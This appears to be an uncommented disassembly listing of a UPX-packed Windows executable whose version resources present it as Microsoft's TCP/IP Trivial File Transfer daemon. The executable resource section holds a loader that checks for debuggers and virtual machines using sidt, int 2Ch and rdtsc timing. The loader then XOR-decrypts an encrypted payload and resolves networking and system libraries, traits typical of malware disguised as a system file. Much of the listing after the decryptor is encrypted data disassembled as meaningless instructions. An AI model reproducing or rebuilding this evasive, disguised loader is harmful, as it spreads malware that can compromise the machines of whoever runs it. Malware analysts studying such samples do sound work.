		dd 204BC3C3h, 72657456h, 0B2B61136h, 43229394h,	386B2EC8h
		dd 65946F6Eh, 0B2932E58h, 526EBC21h, 0BD624663h, 92DB8690h
		dd 58CB785Eh, 93827672h, 666EC7FDh, 22702C74h, 742E2A72h
		dd 4822743Fh, 16458F57h, 48495D7Bh, 6B39A509h, 46CD7086h
		dd 3A787747h, 0E5181121h, 4E0E3AF2h, 0BD11C00Bh, 7041F845h
		dd 35D69C2h, 677B6172h,	5C2DBDE2h, 0C707C68h, 6372147Dh
		dd 3614E15Fh, 0D685D173h, 58BD4A09h, 0C44B42Ah,	41B96D6Eh
		dd 38286B43h, 4D336F21h, 83DE3C6Ch, 108870C0h, 2D5904F0h
		dd 11C6821Eh, 2AC08101h, 5EE04145h, 0EE54A367h,	0B260A07h
		dd 16653ED8h, 9A69D8BBh, 0C8905BA6h, 7890B403h,	9B670164h
		dd 244050A6h, 2A2B14h, 0EB6416C2h, 905B037h, 8200C8C1h
		dd 0C4080009h, 366FA031h, 78451C43h, 0B8507469h, 7C40BEDAh
		dd 45E7700Ch, 1169766Eh, 0A8AB1B6Eh, 0BA537109h, 2A661A41h
		dd 65477DBAh, 61254C74h, 0BB0D386Ch, 44F6E205h,	650F6C65h
		dd 1369A643h, 0B3086553h, 0F3638A39h, 3B185324h, 84973515h
		dd 6DB4450Dh, 9FBA39Bh,	36755D52h, 0B365ED54h, 254A2913h
		dd 36446157h, 46B6E6F7h, 53675308h, 4B6A624Fh, 2EDC4314h
		dd 3DA52276h, 676E497Bh, 20DB2BB6h, 48717A17h, 0D8177027h
		dd 0B2CCDB2h, 4621764Ch, 2BBF735Ch, 6F6C431Fh, 0E0486573h
		dd 537DEA67h, 2C7928E6h, 2D6C1549h, 194135A2h, 0B02A0A64h
		dd 30EC9EDh, 6C754DA2h,	64A47025h, 73ECF731h, 2E6C415Ah
		dd 0B02FEDE1h, 2253DBB7h, 54067065h, 53647972h,	8382975h
		dd 287073DBh, 0D1000E64h, 6EDB7090h, 4F674337h,	37654B18h
		dd 67BF578h, 210A1D4h, 0B6957443h, 44768899h, 11063669h
		dd 8952B41h, 0F0513147h, 7B17312Eh, 112E06AFh, 370C3EE0h
		dd 2D6B980Bh, 3BF83E7Bh, 0B586EB5Bh, 74625614h,	45DE828Ch
		dd 38366DBCh, 0A26F4E01h, 0FA417966h, 0CCBB708Eh, 672F6843h
		dd 7049AC65h, 0E9F05410h, 0EBA68246h, 695F7CADh, 0CEBA20DCh
		dd 0A6D6295h, 616DC15Fh, 41C35ED7h, 850E2B88h, 0AEBA5D56h
		dd 0AD5D1A39h, 656C1172h, 0B866D06Bh, 0A16307D7h, 301F0807h
		dd 3C9B99D8h, 1F66080Dh, 8067F766h, 33B3AF8Ah, 43696468h
		dd 0BB76470Ch, 0F6F6E49h, 6F666B6Dh, 0C518E2Bh,	256306DBh
		dd 7670667Dh, 29F88BB6h, 685F1678h, 0ED9133F1h,	5F0C2FB5h
		dd 745F70ACh, 90F3579h,	0C44CCDD6h, 0B21665Fh, 360D6D3Dh
		dd 970B7113h, 637B756Ah, 5B05ED76h, 727055DEh, 0F0236669h
		dd 0B445AEEFh, 58766ECDh, 0FD9E5E63h, 62D7338Ah, 8E06166Dh
		dd 0AF0B345Fh, 1407181Dh, 6B44F657h, 0A2ED74CDh, 0C45A765Fh
		dd 5B5F63Ch, 759EA143h,	0B4743F8Eh, 0EFF157A7h,	5208776Fh
		dd 0E4556C74h, 9D92D662h, 0F660F66h, 0EDBE0C3h,	6369F337h
		dd 696F236Dh, 26610680h, 610478Dh, 0DA9EF72h, 8DB6291h
		dd 6B0F6B34h, 0AC6C1E1Dh, 32446639h, 30521401h,	5918831h
		dd 0A6DB5A25h, 6F4BFD3h, 53415357h, 6FFF850Dh, 0B82B7302h
		dd 0E6116231h, 127B9A53h, 64476983h, 764F2509h,	748B6239h
		dd 0ED39254Fh, 0D0F1A6Ch, 74A15B22h, 5F7F7663h,	0ED960A0Fh
		dd 29A43149h, 0C0203FFh, 65883102h, 14173759h, 40FFF2A7h
		dd 4550FEh, 3014C00h, 30F00E0h,	0C05010Bh, 5E933400h, 2718D837h
		dd 810043Ah, 6E4EC33Fh,	3020B63h, 3C040005h, 0A8A476C8h
		dd 0EDCB2C80h, 4E4030Dh, 3704D9BEh, 10431004h, 72CF2E4h
		dd 708C3BFCh, 0CABB03D8h, 11802BCEh, 0A933800h,	88AC1889h
		dd 2FB48064h, 2EE177D8h, 2674787Fh, 0C1EB9033h,	6B0BB71h
		dd 60022023h, 90F8242Eh, 0FB5B906Eh, 270E12DCh,	78A36C3Ah
		dd 2EC040B9h, 0C3004F72h, 1841B29Bh, 27481070h,	1B40h
		dd 3E08F7DCh, 97E9C0Dh,	0FF000000h, 0
; ---------------------------------------------------------------------------
		pusha
		mov	esi, offset dword_1007000
		lea	edi, [esi-6000h]
		push	edi
		or	ebp, 0FFFFFFFFh
		jmp	short loc_1009032
; ---------------------------------------------------------------------------
		align 8


loc_1009028:				; CODE XREF: UPX1:loc_1009039j
		mov	al, [esi]
		inc	esi
		mov	[edi], al
		inc	edi


loc_100902E:				; CODE XREF: UPX1:010090C6j
					; UPX1:010090DDj
		add	ebx, ebx
		jnz	short loc_1009039


loc_1009032:				; CODE XREF: UPX1:01009020j
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_1009039:				; CODE XREF: UPX1:01009030j
		jb	short loc_1009028
		mov	eax, 1


loc_1009040:				; CODE XREF: UPX1:0100904Fj
					; UPX1:0100905Aj
		add	ebx, ebx
		jnz	short loc_100904B
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_100904B:				; CODE XREF: UPX1:01009042j
		adc	eax, eax
		add	ebx, ebx
		jnb	short loc_1009040
		jnz	short loc_100905C
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_1009040


loc_100905C:				; CODE XREF: UPX1:01009051j
		xor	ecx, ecx
		sub	eax, 3
		jb	short loc_1009070
		shl	eax, 8
		mov	al, [esi]
		inc	esi
		xor	eax, 0FFFFFFFFh
		jz	short loc_10090E2
		mov	ebp, eax


loc_1009070:				; CODE XREF: UPX1:01009061j
		add	ebx, ebx
		jnz	short loc_100907B
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_100907B:				; CODE XREF: UPX1:01009072j
		adc	ecx, ecx
		add	ebx, ebx
		jnz	short loc_1009088
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_1009088:				; CODE XREF: UPX1:0100907Fj
		adc	ecx, ecx
		jnz	short loc_10090AC
		inc	ecx


loc_100908D:				; CODE XREF: UPX1:0100909Cj
					; UPX1:010090A7j
		add	ebx, ebx
		jnz	short loc_1009098
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx


loc_1009098:				; CODE XREF: UPX1:0100908Fj
		adc	ecx, ecx
		add	ebx, ebx
		jnb	short loc_100908D
		jnz	short loc_10090A9
		mov	ebx, [esi]
		sub	esi, 0FFFFFFFCh
		adc	ebx, ebx
		jnb	short loc_100908D


loc_10090A9:				; CODE XREF: UPX1:0100909Ej
		add	ecx, 2


loc_10090AC:				; CODE XREF: UPX1:0100908Aj
		cmp	ebp, 0FFFFF300h
		adc	ecx, 1
		lea	edx, [edi+ebp]
		cmp	ebp, 0FFFFFFFCh
		jbe	short loc_10090CC


loc_10090BD:				; CODE XREF: UPX1:010090C4j
		mov	al, [edx]
		inc	edx
		mov	[edi], al
		inc	edi
		dec	ecx
		jnz	short loc_10090BD
		jmp	loc_100902E
; ---------------------------------------------------------------------------
		align 4


loc_10090CC:				; CODE XREF: UPX1:010090BBj
					; UPX1:010090D9j
		mov	eax, [edx]
		add	edx, 4
		mov	[edi], eax
		add	edi, 4
		sub	ecx, 4
		ja	short loc_10090CC
		add	edi, ecx
		jmp	loc_100902E
; ---------------------------------------------------------------------------


loc_10090E2:				; CODE XREF: UPX1:0100906Cj
		pop	esi
		mov	edi, esi
		mov	ecx, 61h


loc_10090EA:				; CODE XREF: UPX1:010090F1j
					; UPX1:010090F6j
		mov	al, [edi]
		inc	edi
		sub	al, 0E8h


loc_10090EF:				; CODE XREF: UPX1:01009114j
		cmp	al, 1
		ja	short loc_10090EA
		cmp	byte ptr [edi],	0
		jnz	short loc_10090EA
		mov	eax, [edi]
		mov	bl, [edi+4]
		shr	ax, 8
		rol	eax, 10h
		xchg	al, ah
		sub	eax, edi
		sub	bl, 0E8h
		add	eax, esi
		mov	[edi], eax
		add	edi, 5
		mov	eax, ebx
		loop	loc_10090EF
		lea	edi, [esi+7000h]


loc_100911C:				; CODE XREF: UPX1:0100913Ej
		mov	eax, [edi]
		or	eax, eax
		jz	short loc_1009167
		mov	ebx, [edi+4]
		lea	eax, [eax+esi+93D0h]
		add	ebx, esi
		push	eax
		add	edi, 8
		call	dword ptr [esi+945Ch]
		xchg	eax, ebp


loc_1009139:				; CODE XREF: UPX1:0100915Fj
		mov	al, [edi]
		inc	edi
		or	al, al
		jz	short loc_100911C
		mov	ecx, edi
		jns	short near ptr loc_100914A+1
		movzx	eax, word ptr [edi]
		inc	edi
		push	eax
		inc	edi


loc_100914A:				; CODE XREF: UPX1:01009142j
		mov	ecx, 0AEF24857h
		push	ebp
		call	dword ptr [esi+9460h]
		or	eax, eax
		jz	short loc_1009161
		mov	[ebx], eax
		add	ebx, 4
		jmp	short loc_1009139
; ---------------------------------------------------------------------------


loc_1009161:				; CODE XREF: UPX1:01009158j
		call	dword ptr [esi+9464h]


loc_1009167:				; CODE XREF: UPX1:01009120j
		popa
		jmp	loc_1003A50
; ---------------------------------------------------------------------------
		align 1000h
UPX1		ends

; Section 3. (virtual address 0000A000)
; Virtual size			: 00008000 (  32768.)
; Section size in file		: 00008000 (  32768.)
; Offset to raw	data for section: 0000A000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_rsrc		segment	para public 'CODE' use32
		assume cs:_rsrc
		;org 100A000h
		assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
		dd 3 dup(0)
		dd 10000h, 10h,	80000018h, 3 dup(0)
		dd 10000h, 1, 80000030h, 3 dup(0)
		dd 10000h, 409h, 48h, 0A05Ch, 374h, 2 dup(0)
		dd 7060h, 340374h, 560000h, 5F0053h, 450056h, 530052h
		dd 4F0049h, 5F004Eh, 4E0049h, 4F0046h, 0
		dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
		dd 3Fh,	0
		dd 40004h, 1, 3	dup(0)
		dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
		dd 66006Eh, 6Fh, 2B0h, 300001h,	300034h, 300039h, 420034h
		dd 30h,	16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
		dd 65006Dh, 0
aMicrosoftCorpo:
		unicode	0, <Microsoft Corporation>,0
aR:
		unicode	0, <r%>
		dd 460001h, 6C0069h, 440065h, 730065h, 720063h,	700069h
		dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
		unicode	0, <TCP/IP Trivial file	transfer daemon.>,0
		align 4
a8		db '8',0
		dw 0Ch
		dd 460001h, 6C0069h, 560065h, 720065h, 690073h,	6E006Fh
		dd 0
a5_00_2134_1:
		unicode	0, <5.00.2134.1>,0
a4:
		unicode	0, <4>
		dw 0Ah
		dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch,	6D0061h
		dd 65h,	660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
		dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h,	690072h
		dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
		dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh,	66006Fh
		dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h,	310038h
		dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
		dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h,	65h, 660074h
		dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
		dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
		unicode	0, <Microsoft(R) Windows (R) 2000 Operating System>,0
		align 10h
		db '<',0
		dw 0Ch
		dd 500001h, 6F0072h, 750064h, 740063h, 650056h,	730072h
		dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
		dd 31h,	44h, 560001h, 720061h, 690046h,	65006Ch, 6E0049h
		dd 6F0066h, 0
		dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
		dd 6E006Fh, 0
		dd 4B00409h, 3 dup(0)
		dd 0A494h, 0A45Ch, 3 dup(0)
		dd 0A4A1h, 0A46Ch, 3 dup(0)
		dd 0A4AEh, 0A474h, 3 dup(0)
		dd 0A4BBh, 0A47Ch, 3 dup(0)
		dd 0A4C6h, 0A484h, 3 dup(0)
		dd 0A4D0h, 0A48Ch, 5 dup(0)
		dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
		dd 77DD6BF0h, 0
		dd 76D63B9Ch, 0
; ---------------------------------------------------------------------------
		sbb	eax, edx
		retn	77h
; ---------------------------------------------------------------------------
		align 4
		dd 7C924C29h, 0
		dd 71AB2C69h, 0
		dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
		dd 6C642E32h, 7069006Ch, 61706C68h, 642E6970h, 4D006C6Ch
		dd 52435653h, 6C642E54h, 746E006Ch, 2E6C6C64h, 6C6C64h
		dd 5F325357h, 642E3233h, 6C6Ch,	64616F4Ch, 7262694Ch, 41797261h
		dd 65470000h, 6F725074h, 64644163h, 73736572h, 78450000h
		dd 72507469h, 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh
		dd 65470000h, 41704974h, 54726464h, 656C6261h, 72660000h
		dd 6565h, 696F7461h, 2B4h dup(0)
		assume ds:seg000

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near
		cld
		call	loc_100B02E
start		endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_100B006	proc near		; CODE XREF: .rsrc:0100B07Dp
		push	ebx
		mov	ecx, 0DA5h
		mov	ebx, edx


loc_100B00E:				; CODE XREF: sub_100B006+13j
		xor	[eax], dx
		lea	eax, [eax+2]
		xchg	dl, dh
		lea	edx, [ebx+edx]
		loop	loc_100B00E
		pop	ebx
		retn
sub_100B006	endp

; ---------------------------------------------------------------------------
		db 0ECh, 0A7h
; ---------------------------------------------------------------------------


loc_100B01F:				; CODE XREF: .rsrc:0100B068j
		pop	ebp
		retn
; ---------------------------------------------------------------------------


loc_100B021:				; CODE XREF: .rsrc:0100B036j
					; .rsrc:0100B047j
		push	ebp
		mov	eax, 8000h
		xor	ecx, ecx
		jmp	short loc_100B055

; =============== S U B	R O U T	I N E =======================================



sub_100B02B	proc near		; CODE XREF: .rsrc:0100B04Ap
					; .rsrc:0100B050p
		rdtsc
		retn
sub_100B02B	endp

; ---------------------------------------------------------------------------


loc_100B02E:				; CODE XREF: start+1p
		test	eax, eax
		jnz	short loc_100B03A
		int	2Ch		; Internal routine for MSDOS (IRET)
		test	eax, eax
		jns	short loc_100B021
		jmp	short loc_100B049
; ---------------------------------------------------------------------------


loc_100B03A:				; CODE XREF: .rsrc:0100B030j
		push	eax
		sidt	fword ptr [esp-2]
		pop	eax
		mov	eax, [eax+6]
		shl	eax, 10h
		jns	short loc_100B021


loc_100B049:				; CODE XREF: .rsrc:0100B038j
		push	ebp
		call	sub_100B02B
		xchg	eax, ecx
		call	sub_100B02B


loc_100B055:				; CODE XREF: .rsrc:0100B029j
		sub	eax, ecx
		mov	ebp, [esp+4]
		sub	dword ptr [esp+4], 1FF6h
		sub	eax, 100h
		jnb	short loc_100B01F
		sub	ebp, 301006h
		lea	eax, [ebp+301082h]
		mov	dx, [eax-65h]
		call	sub_100B006
		pop	es
		cmpsd
		sbb	al, cl
		movsb
		xor	esp, [esi+443F14CBh]
		inc	ebx
		into
		loop	loc_100B105
		sbb	eax, 65EB8366h
		cmp	ecx, [ebx-0B9B8799h]
		cli
		xchg	edi, [ebx-6B0BEA72h]
		db	3Eh
		mov	edi, 8C513A20h
		sar	byte ptr [edi],	1
		sbb	al, 7Ah
		or	eax, 6E43F14Bh
		cmpsd
		xchg	eax, ebp
		test	ah, al
		db	2Eh
		dec	esi
		jb	short loc_100B11D
		or	ebx, [ecx+ebx*2-0Eh]
		jle	short loc_100B0CE
		rol	eax, 0D4h
		iret
; ---------------------------------------------------------------------------
		dd 834F7DEh, 1229EC42h
		db 0A3h, 0F9h
; ---------------------------------------------------------------------------


loc_100B0CE:				; CODE XREF: .rsrc:0100B0BEj
		adc	eax, 348A39ADh
		xor	eax, 4D3AA9D9h
		pop	esi
		mov	ebx, 0D4A5EA2h
		push	ebx
		xchg	dl, [edx+37F2B9BFh]
		add	ds:5EF10674h[esi*2], ch
		retf	5065h
; ---------------------------------------------------------------------------
		db 0C8h
		dd 0E531FBA8h, 69A32AC1h, 8F015655h, 0F4A28B8Ch, 4B0F0838h
		db 65h
; ---------------------------------------------------------------------------


loc_100B105:				; CODE XREF: .rsrc:0100B08Fj
		push	ebx
; ---------------------------------------------------------------------------
		dw 0EBFEh
		dd 0C91B705Bh, 0E01611E9h, 74BAC224h, 67222160h, 0FDA99087h
		db 0E6h
; ---------------------------------------------------------------------------


loc_100B11D:				; CODE XREF: .rsrc:0100B0B8j
		in	eax, dx
		sbb	[ebp+1Ch], edx
		dec	esi
		not	byte ptr [edx]
		cmp	[eax+edx*2], esi
		jnb	short loc_100B19D
		inc	ebp
		fxch	st(6)
		fcomp	st(1)
		lds	eax, ds:0FCDD62ACh
; ---------------------------------------------------------------------------
		assume ds:nothing
		dd 0F712FEFEh, 1054006Ch
		db 17h,	29h
; ---------------------------------------------------------------------------


loc_100B13E:				; CODE XREF: .rsrc:0100B1A0j
		nop
		lfs	edi, [eax]
		dec	ecx
		pusha
		dec	edi
		push	ecx
		mov	esi, 0E1F09B52h
		mov	esi, [edi-6]
		shl	byte ptr [ebx+1Eh], 3Dh
		stc
		mov	dl, 1Dh
		add	al, 0Dh
		push	ebx
		add	dh, ds:4C008D21h
		enter	6A7Ch, 5Dh
		dec	eax
		mov	ebx, [ebx+29h]
		mul	dword ptr [esi-663AF67Eh]
		add	ebp, [eax]
		add	al, 8Dh
		arpl	[ecx], sp	; CODE XREF: .rsrc:0100B199j
		and	eax, 2C7015BBh	; CODE XREF: .rsrc:0100B192j
		push	edi
		idiv	byte ptr [esi+eax*8]
		jle	short loc_100B1E3
		push	0CA478E0Bh
		repne xchg eax,	edx
; ---------------------------------------------------------------------------
		dd 2C0E8E8Eh, 5FF02348h
; ---------------------------------------------------------------------------
		stosd
		wait


loc_100B18E:				; CODE XREF: .rsrc:0100B1BAj
		xchg	eax, ebx
		pop	esi
		inc	ebp
		cld
		ja	short near ptr loc_100B172+2
		and	[edx-6], dl
		xchg	eax, ebx
		inc	edx
		jnb	short near ptr loc_100B170+1
		lahf
; ---------------------------------------------------------------------------
		db 34h
; ---------------------------------------------------------------------------


loc_100B19D:				; CODE XREF: .rsrc:0100B127j
		adc	al, bl
		lodsd
		jb	short loc_100B13E
		add	al, 0E4h
		pop	ds
		cmp	ch, [ebx]
		aad	0C1h
		cmp	al, 3Ah
		inc	esp
		jns	short loc_100B215
		inc	ebx
		cmp	al, 1
		hlt
; ---------------------------------------------------------------------------
		dw 15D8h
; ---------------------------------------------------------------------------
		test	eax, 9A256B7Fh


loc_100B1B9:				; CODE XREF: .rsrc:0100B213j
		push	esp
		jmp	short loc_100B18E
; ---------------------------------------------------------------------------
		dd 2450A4E4h, 0E8272B38h, 5F5A4A45h, 5C276350h,	0F6E2F694h
		dd 41E37588h, 410A2E30h, 1F1ABD70h, 7B324647h
		db 55h,	6Fh, 0C6h
; ---------------------------------------------------------------------------


loc_100B1E3:				; CODE XREF: .rsrc:0100B17Bj
		nop
		pop	esp
		outsb
		sar	ebx, 1
		mov	ecx, 93A7E617h	; CODE XREF: .rsrc:0100B268j
		pop	ss
		outsd
		cmp	esi, [edi]
		sbb	dl, [esi]
		inc	edx
		db	2Eh
		inc	ebx
		mov	ebx, 9BA14F53h
		or	[ecx], al
		db	65h, 3Eh
		stos	dword ptr es:[edi]
		cld
		xchg	cl, [edi+edx]
		cmp	dh, cl
		mov	ds:940D0B3Fh, eax
		jbe	short near ptr loc_100B23E+1
		lds	ecx, [ecx-1EBCC5AFh]
		jle	short loc_100B1B9


loc_100B215:				; CODE XREF: .rsrc:0100B1ACj
		sbb	[esi+55h], edx
		xchg	dh, dl
		fst	qword ptr [edi-341B857Eh]
		cmp	eax, 6E3D0529h
		lea	ebx, [edx+edx*4]
		xor	ebp, eax
		aad	0E4h
		rcl	ch, cl
		push	esi
		adc	[esi+3], ah
		push	esp
		db	66h
		cli
		clc
		call	near ptr 7D91985Dh
		aaa
		and	bl, bl


loc_100B23E:				; CODE XREF: .rsrc:0100B20Bj
		test	[ebx], ebp
		popf
		mov	[ebx+ebx*8+29BC438Ah], ah
		fsubr	st, st
		int	3		; Trap to Debugger
		in	al, dx
		jb	short near ptr loc_100B271+1
		or	[edx], bl
		push	es
		or	al, 0F4h
		mov	dword ptr [ecx+7A4D605Dh], 0A9851D5Ah
		lds	esi, [eax-2E58AA98h]
		sbb	al, 0C2h
		fcomp	st
		stc
		ja	short near ptr loc_100B1E8+2
		insd
		and	eax, 92E181EEh
		xchg	eax, ebp


loc_100B271:				; CODE XREF: .rsrc:0100B24Cj
		test	al, 7Ch
		dec	eax
		cmp	[eax+ebp], edi
		or	[edi-2Eh], ah
		mov	esp, 9640B75h
		jmp	far ptr	0E21Ch:62E99DFFh
; ---------------------------------------------------------------------------
		dw 15Bh
		dd 6FAF41Dh, 759A0E32h,	0E2334775h, 81C5565Dh, 155D876Dh
		dd 0FCA10301h, 3CCFDBD0h, 0FC0ABED7h, 0D126BF8Ch, 0F80F44EEh
		dd 315E2ED7h, 20575701h, 5B6802BDh, 478FA15Bh, 0F78A8AB0h
		dd 60B7CBF7h, 34906DFh,	0EA5B79EFh, 0D472B6AFh,	3A891B67h
		dd 53AA8592h, 0CC17FFBEh, 843DD6E3h, 88596A67h,	0A3E9FFC1h
		dd 1BEC1404h, 0BBEE2513h, 0D92036B6h, 72397D60h, 0B7E66762h
		dd 1B9E8A73h, 0B5720607h, 0C9899D98h, 0E631B0ABh, 6BC13AC2h
		dd 0D5C8DCD9h, 2F58EDDAh, 265DAAF3h, 0BA01EAEDh, 4F692EA9h
		dd 6FA23D3Ah, 768DFD4Bh, 7BAE7C81h, 46177F7h, 0B378BCA1h
		dd 0F627BAA3h, 5A5F4BB2h, 35B34746h, 6AC8DCDBh,	165C7188h
		dd 850FB98Fh, 0F20F98A5h, 8EE2C43h, 0E6A8B042h,	0B92A57B0h
		dd 0E78311E6h, 0AC701679h, 84E987B8h, 488C1DA0h, 0D8A93834h
		dd 8F473285h, 89E706A3h, 98DFBEF4h, 87158784h, 6B035C95h
		dd 32374B9Eh, 63D4A1EBh, 14C3BD00h, 10570B3Ch, 0A4803277h
		dd 3814561Bh, 0CC12264Ch, 31E6D0B0h, 0A434241Eh, 0A447771Fh
		dd 9F3A7644h, 0FB9E4ACCh, 0C88A9EFBh, 5C1E58FBh, 1B6AC0Fh
		dd 0AD443057h, 0C7B2EE81h, 4D6E821Fh, 44684713h, 0C20355F7h
		dd 0BC2A0E17h, 78415796h, 0B535BE7h, 9F5074F7h,	8A79BD9Bh
		dd 0C70D290Ah, 0FE525A38h, 0FF35A4C6h, 644DDEBh, 176D6569h
		dd 3F7CE5FCh, 3EB580C4h, 938CD278h, 8EADF192h, 0FA415544h
		dd 0E5BA86AAh, 50390D0Fh, 0D9946767h, 1FF4C2C4h, 0B8505554h
		dd 8EE9CD88h, 3566B8C8h, 44657DF1h, 7D74B8AEh, 0AB28764Dh
		dd 0C0094F52h, 6C30746Dh, 42B18715h, 475A06FFh,	0CF3F74ABh
		dd 2897C190h, 9E132725h, 3C2FFDCh, 876B2838h, 0E5A69588h
		dd 1D061010h, 6D62F45Fh, 0CF8BAFB7h, 8E4965F4h,	93E49194h
		dd 306B22CDh, 841E6DECh, 0E5FB7DD7h, 0D602263Fh, 0AF94C0A8h
		dd 0D4063BA9h, 79966BD0h, 27C56664h, 84E97019h,	0A186DAD8h
		dd 0C83D0D71h, 0F9224387h, 0F00565A5h, 7B9E89DCh, 287124E5h
		dd 0DF318004h, 0C106DFCBh, 2CF75F2Fh, 0DA5E5CBh, 46B3F53h
		dd 0BFF9A472h, 57A9F87Bh, 431582D3h, 7991A5A6h,	0EEC6A8FFh
		dd 5E5448F3h, 2E38616Eh, 8A003573h, 7A248886h, 92594A4Ah
		dd 0C363E3FEh, 0EA006FBFh, 0A9D1853h, 362C9365h, 4B6E70F6h
		dd 0D27FA3BEh, 31ECDA4Ah, 0AF3244E9h, 1D3B7F65h, 0A20B627Ah
		dd 49637777h, 9A3A9EF5h, 0D0749FADh, 0D92F18FCh, 9249292Ch
		dd 1475BA6h, 0A680EEEDh, 783FD348h, 0BD037E44h,	951DAAADh
		dd 0E9406E6Ch, 0BAEC165Ah, 59240333h, 5E0511F9h, 0A0F47272h
		dd 0C93D346Dh, 0DF0E4E7h, 0DAE4DCB6h, 414ADDEDh, 0E6D6B251h
		dd 0ACA95D5Dh, 4085B9CCh, 0D4193D8Eh, 68ADC1C1h, 0FC415554h
		dd 90D5E9E8h, 0DB3A2B2Dh, 87D6C885h, 0E7C80EA3h, 2450F9B3h
		dd 2F7A2329h, 623E001Dh, 0FE8D95BDh, 4516C7E3h,	0B07C7F7Eh
		dd 34F9E3F3h, 99591237h, 13C4ADA3h, 702A1818h, 0CBEB8B9Eh
		dd 570DE7E0h, 8C134942h, 17C6DEC9h, 9B52092Ah, 0C8CFA286h
		dd 6B021205h, 0DE9E4D6Eh, 36EAD2FBh, 0BD715A42h, 1CF0C787h
		dd 67333A3Fh, 0F5B59CBEh, 6B1DF1E7h, 0DB705516h, 0F3DECBh
		dd 9245535Bh, 8D686B7h,	0E360703h, 0C3808BB9h, 5E2DE8FAh
		dd 0AE6C4450h, 3BD3F6B6h, 0A6503D2Bh, 0EEA5B2B1h, 292D1D17h
		dd 0CC9F5634h, 2EEDEAE9h, 0AD5C2D59h, 1F9B5A8h,	99203027h
		dd 0E5B0AEE9h, 4005143Bh, 0CA896550h, 38E4C7CDh, 0E0644A5Dh
		dd 32CDA88Bh, 5B280D09h, 9C858E9Dh, 7600EDCFh, 906D7075h
		dd 58F9DDD9h, 0A1442103h, 0ECB1BCB7h, 78312A09h, 0CA8D4E65h
		dd 7C80D5F6h, 0A0595C42h, 6C4C9DFh, 93523107h, 8B91818Fh
		dd 4C101D30h, 0D78C7F72h, 34E5E4F3h, 0B5545757h, 6EF5B1B4h
		dd 563C391Dh, 0D0AB828Bh, 640AEFEBh, 0FF667A77h, 26F2ECAAh
		dd 96465A6Ah, 12CBB282h, 6B146727h, 0D083AC8Eh,	5815E7FDh
		dd 0BE6B6522h, 2DD0D3E0h, 0B7582523h, 0C1CA9FA6h, 75080617h
		dd 0C89F736Ah, 2EE0F4D0h, 0A17B435Fh, 28C0ADA8h, 89271155h
		dd 0F5B883BEh, 61190912h, 0DB9B6078h, 35E0C9D0h, 8F4A7D38h
		dd 35D6AFAEh, 6B210E0Ch, 0FD8EB9F4h, 521CC5ECh,	0BD7B7C6Eh
		dd 39D0B1F1h, 89581334h, 0C6A396AFh, 143C0105h,	0C988714Fh
		dd 5EEDFCD5h, 0BF65486Ah, 22CED3D2h, 924D1E4Fh,	0E4A3B58Dh
		dd 6C161C14h, 0DD8B5D0Bh, 35FEC4FDh, 0B3670701h, 6EC1BAB4h
		dd 61262F0Ah, 0A5AF838Bh, 5215CAB0h, 0DB561862h, 3BDEC8CBh
		dd 0B52C2552h, 1386A0B7h, 7A150D0Ah, 0C08E898Eh, 451EFBFBh
		dd 0AF5C2363h, 32CAF1C2h, 9B581B2Fh, 0F4AEABB0h, 6E3A2072h
		dd 0C89F6E40h, 24EAF2CDh, 0B0777C2Dh, 3CAFB3A4h, 8D223A3Bh
		dd 0E6B282BFh, 4C2D1932h, 0EEFF767Dh, 39E7D5CDh, 8C665759h
		dd 74D8A0A0h, 7C261137h, 0F08BB091h, 44388AEDh,	0B1607A5Dh
		dd 2ACEC6C3h, 805B302Dh, 0F3A3BDBDh, 71310138h,	0D3A0026Eh
		dd 5AE7E4D0h, 0A6504F53h, 2DAADBD7h, 924C113Bh,	0DBB79282h
		dd 7A051505h, 0FCFA7D78h, 23FCE1EAh, 8A474253h,	0BD5A5B4h
		dd 7A0F2D29h, 0D5A9BFEEh, 5E10E0F0h, 0DD604A73h, 3CF6C4DEh
		dd 0AB590F3Eh, 1397A5B3h, 681A1E03h, 0D68B99A9h, 3612FFE7h
		dd 0BA5F506Ch, 37E2D6D3h, 0BC382926h, 0E3BCAFAAh, 7512241Ch
		dd 0DE876D65h, 24E3F3CDh, 0A1523043h, 7D5B48Eh,	89273D06h
		dd 91B68380h, 573CF433h, 0DA65607Eh, 3FFDFED1h,	8D49494Dh
		dd 1AD1B580h, 47501D13h, 0F896A681h, 4824F2FBh,	0A86E6B6Eh
		dd 36F9DDF8h, 99522A37h, 81A9B4B0h, 670C1B23h, 0FE8A7768h
		dd 49F7E5FDh, 0B55A4749h, 1DD9D0D1h, 944B0150h,	0EFBA89B1h
